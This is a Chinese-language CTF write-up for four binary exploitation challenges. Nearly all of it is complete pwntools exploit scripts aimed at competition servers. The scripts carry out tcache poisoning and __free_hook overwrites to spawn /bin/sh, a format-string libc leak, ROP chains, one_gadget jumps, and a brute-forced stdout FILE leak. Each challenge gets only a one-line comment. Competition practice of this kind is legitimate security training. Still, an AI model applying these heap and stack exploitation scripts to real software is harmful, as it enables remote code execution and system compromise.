难受,缺氧了,连着三天打完后,身体受不了附件
babyheap
挺简单的堆
1 | from pwn import* |
2 | def menu(ch): |
3 | p.sendlineafter('>>',str(ch)) |
4 | def new(): |
5 | menu(1) |
6 | def show(index): |
7 | menu(2) |
8 | p.sendlineafter('?',str(index)) |
9 | def edit(index,size,content): |
10 | menu(3) |
11 | p.sendlineafter('?',str(index)) |
12 | p.sendlineafter(':',str(size)) |
13 | p.sendafter(':',content) |
14 | def free(index): |
15 | menu(4) |
16 | p.sendlineafter('?',str(index)) |
17 | p = process('./main') |
18 | p = remote('47.111.104.169',57303) |
19 | libc =ELF('./libc-2.27.so') |
20 | for i in range(10): |
21 | new() |
22 | for i in range(9,2,-1): |
23 | free(i) |
24 | |
25 | free(0) |
26 | free(1) |
27 | free(2) |
28 | |
29 | for i in range(7): |
30 | new() |
31 | new() |
32 | new() |
33 | new() |
34 | |
35 | free(8) |
36 | |
37 | for i in range(6): |
38 | free(i) |
39 | free(7) |
40 | for i in range(6): |
41 | new() |
42 | new() # 7 TARGET |
43 | edit(7,0xF8,'FMYY') |
44 | |
45 | for i in range(7): |
46 | free(i) |
47 | free(9) |
48 | |
49 | for i in range(7): |
50 | new() |
51 | new() |
52 | show(7) |
53 | |
54 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x10 - 0x60 |
55 | log.info('LIBC:\t' + hex(libc_base)) |
56 | free_hook = libc_base + libc.sym['__free_hook'] |
57 | system = libc_base + libc.sym['system'] |
58 | new() #9 |
59 | |
60 | for i in range(5): |
61 | free(i) |
62 | free(7) |
63 | free(9) |
64 | |
65 | new() |
66 | edit(0,0xF0,p64(free_hook)) |
67 | new() |
68 | edit(1,0xF0,'/bin/sh') |
69 | new() |
70 | edit(2,0xF0,p64(system)) |
71 | free(1) |
72 | p.interactive() |
blend
异常的时候有个栈溢出,然后会跳回到main函数的结束位置,迁移到堆上执行ROP
1 | from pwn import* |
2 | def menu(ch): |
3 | p.sendlineafter('choice >',str(ch)) |
4 | def show_name(index): |
5 | menu(1) |
6 | def new(content): |
7 | menu(2) |
8 | p.sendafter('input note:',content) |
9 | def free(index): |
10 | menu(3) |
11 | p.sendlineafter('index>',str(index)) |
12 | def show(): |
13 | menu(4) |
14 | def gift(content): |
15 | menu(666) |
16 | p.sendlineafter(':',content) |
17 | |
18 | p = process('./main') |
19 | p = remote('47.111.104.99',51504) |
20 | libc =ELF('./libc-2.23.so') |
21 | p.sendlineafter(':','%11$p') |
22 | menu(1) |
23 | p.recvuntil('Current user:') |
24 | libc_base = int(p.recv(14),16) - libc.sym['__libc_start_main'] - 240 |
25 | log.info('LIBC:\t' + hex(libc_base)) |
26 | new('FMYY\n') |
27 | new('FMYY'*2*4 + p64(libc_base + 0x4527A) + '\n') |
28 | free(1) |
29 | free(0) |
30 | show() |
31 | p.recvuntil('index 1:') |
32 | heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x1C80 |
33 | log.info('HEAP:\t' + hex(heap_base)) |
34 | gift('FMYY'*2*4 + p64(heap_base + 0x1C80 + 0x28)[0:7]) |
35 | p.interactive() |
pwn_Printf
非预期,按照Google CTF 的sprint逆向改的一个Pwn题,如果要逆出来,确实有点难度,但是可以直接跳过,最后就一个简单栈溢出
1 | from pwn import* |
2 | p = process('./main') |
3 | p = remote('47.111.96.55',55106) |
4 | elf =ELF('./main') |
5 | libc =ELF('./libc-2.23.so') |
6 | for i in range(16): |
7 | p.sendline('32') |
8 | pop_rdi_ret = 0x0000000000401213 |
9 | payload = p64(elf.got['read']) + p64(pop_rdi_ret) + p64(elf.got['read']) + p64(elf.plt['puts']) + p64(0x4007D4) + p64(elf.plt['puts']) |
10 | p.sendline(payload) |
11 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['read'] |
12 | log.info('LIBC:\t' + hex(libc_base)) |
13 | |
14 | payload = '\x00'*8 + p64(libc_base + 0xF1207) |
15 | p.sendline(payload) |
16 | p.interactive() |
only_add
堆风水,直到比赛结束都没有布置出一个合理的堆结构,赛后花了两个小时成功构造出来,懒得再一步布置了,概率1/256爆破吧
1 | from pwn import* |
2 | def menu(ch): |
3 | p.sendlineafter('choice:',str(ch)) |
4 | def realloc(size,content): |
5 | menu(1) |
6 | p.sendlineafter('Size:',str(size)) |
7 | p.sendafter('Data:',content) |
8 | def free(): |
9 | menu(1) |
10 | p.sendlineafter('Size:',str(0)) |
11 | def R(size,content): |
12 | p.sendline('1') |
13 | sleep(0.1) |
14 | p.sendline(str(size)) |
15 | sleep(0.1) |
16 | p.send(content) |
17 | sleep(0.1) |
18 | def F(): |
19 | p.sendline('1') |
20 | sleep(0.1) |
21 | p.sendline('0') |
22 | sleep(0.1) |
23 | libc =ELF('./libc-2.27.so') |
24 | while True: |
25 | p = process('./main') |
26 | try: |
27 | realloc(0x18,'FMYY') |
28 | free() |
29 | realloc(0x4F0,'FMYY') |
30 | realloc(0x4F0 - 0x80,'FMYY') |
31 | free() |
32 | realloc(0xF0,'FMYY') |
33 | free() |
34 | realloc(0x100,'FMYY') |
35 | realloc(0x28,'FMYY') |
36 | free() |
37 | realloc(0x48,'FMYY') |
38 | free() |
39 | realloc(0x110,'FMYY') |
40 | realloc(0x38,'FMYY') |
41 | free() |
42 | ####### |
43 | realloc(0x58,'FMYY') |
44 | free() |
45 | realloc(0x68,'FMYY') |
46 | free() |
47 | realloc(0x58,'\x00'*0x58 + '\xF1') |
48 | free() |
49 | realloc(0x68,'FMYY') |
50 | free() |
51 | realloc(0x500,'FMYY') |
52 | free() |
53 | realloc(0xE0,'\x00'*0x68 + p64(0x31) + '\x60\x67') |
54 | free() |
55 | ##### |
56 | realloc(0x48,'\x00'*0x48 + '\xC1') |
57 | free() |
58 | realloc(0x38,'FMYY') |
59 | free() |
60 | realloc(0xB0,'\x00'*0x38 + p64(0xE1) + '\xD0\x96') |
61 | free() |
62 | realloc(0xD0,'FMYY') |
63 | realloc(0x70,'FMYY') |
64 | free() |
65 | realloc(0xD0,'FMYY') |
66 | realloc(0x70,'FMYY') |
67 | free() |
68 | |
69 | realloc(0xD0,p64(0xFBAD1800) + '\x00'*0x18 + '\xC8') |
70 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_'] |
71 | log.info('LIBC:\t' + hex(libc_base)) |
72 | if libc_base < 0x7F0000000000: |
73 | p.close() |
74 | continue |
75 | menu(2) |
76 | R(0x80,'FMYY') |
77 | F() |
78 | R(0x90,'FMYY') |
79 | F() |
80 | R(0xA0,'FMYY') |
81 | F() |
82 | R(0x88,'\x00'*0x88 + '\xD1') |
83 | F() |
84 | R(0x90,'FMYY') |
85 | F() |
86 | R(0xC0,'\x00'*0x98 + p64(0xB1) + p64(libc_base + libc.sym['__free_hook'])) |
87 | F() |
88 | R(0xA0,'FMYY') |
89 | R(0x60,'FMYY') |
90 | F() |
91 | R(0xA0,p64(libc_base + 0x10A45C)) |
92 | F() |
93 | break |
94 | except: |
95 | p.close() |
96 | continue |
97 | p.interactive() |